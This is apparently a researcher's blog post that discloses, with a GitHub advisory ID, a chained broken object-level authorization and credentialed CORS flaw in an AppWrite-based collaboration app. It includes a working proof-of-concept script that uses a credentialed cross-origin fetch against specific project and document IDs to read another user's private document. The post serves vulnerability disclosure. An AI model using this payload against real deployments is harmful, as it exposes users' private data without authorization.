Chained Broken Object Level Authorization (BOLA) + CORS Misconfiguration in AppWrite Collab App

Broken Object Level Authorization (BOLA) combined with credentialed CORS misconfiguration enables cross-user, cross-origin authenticated…

Aditya Bhatt

~2 min read · March 2, 2026 (Updated: March 2, 2026) · Free: Yes

Broken Object Level Authorization (BOLA) combined with credentialed CORS misconfiguration enables cross-user, cross-origin authenticated document exfiltration.

GHSA ID: GHSA-3m6r-g5gh-wq6c Official Advisory: https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-3m6r-g5gh-wq6c

Introduction

Most vulnerabilities are dangerous individually.

But when authorization flaws and browser misconfigurations combine, the impact multiplies.

In this research, I identified a real-world deployment vulnerable to:

Broken Object Level Authorization (BOLA)
Credentialed CORS misconfiguration

Together, they enabled cross-user authenticated data exfiltration across origins.

Step 1 — Broken Object Level Authorization

Documents were explicitly restricted per user.

Yet another authenticated user could retrieve them simply by referencing the document ID.

No server-side ownership validation. Direct object access.

Classic BOLA.

Step 2 — CORS Misconfiguration

The backend allowed:

Access-Control-Allow-Origin: <attacker domain>
Access-Control-Allow-Credentials: true

This permits malicious websites to:

Send authenticated requests
Include victim session cookies
Read sensitive API responses

The Same-Origin Policy collapses.

🔥 Proof of Concept (PoC)

Attack Flow

Victim logs into the application.
Victim visits malicious webpage.
JavaScript executes authenticated fetch request.

Exploit Code

<script>
fetch("https://cloud.appwrite.io/v1/databases/6981d87b002e1c8dbc0d/collections/documents/documents/69981f2500182f323cd2", {
  credentials: "include",
  headers: {
    "X-Appwrite-Project": "6981d34b0036b9515a07",
    "X-Appwrite-Response-Format": "1.8.0"
  }
})
.then(r => r.json())
.then(data => {
  document.body.innerHTML = "<pre>" + JSON.stringify(data, null, 2) + "</pre>";
});
</script>

Result

The malicious origin successfully retrieves and renders a private document belonging to another user.

No token theft. No brute force. Just chained trust failures.

Why This Matters

This exploit chain defeats:

Authorization boundary
Browser isolation boundary

It enables scalable authenticated data harvesting with minimal attacker effort.

⭐ Follow Me & Connect

🔗 GitHub: https://github.com/AdityaBhatt3010 💼 LinkedIn: https://www.linkedin.com/in/adityabhatt3010/ ✍️ Medium: https://medium.com/@adityabhatt3010 👨‍💻 PoC Repository: https://github.com/AdityaBhatt3010/

#ghsa #bola #cors #exploit #cybersecurity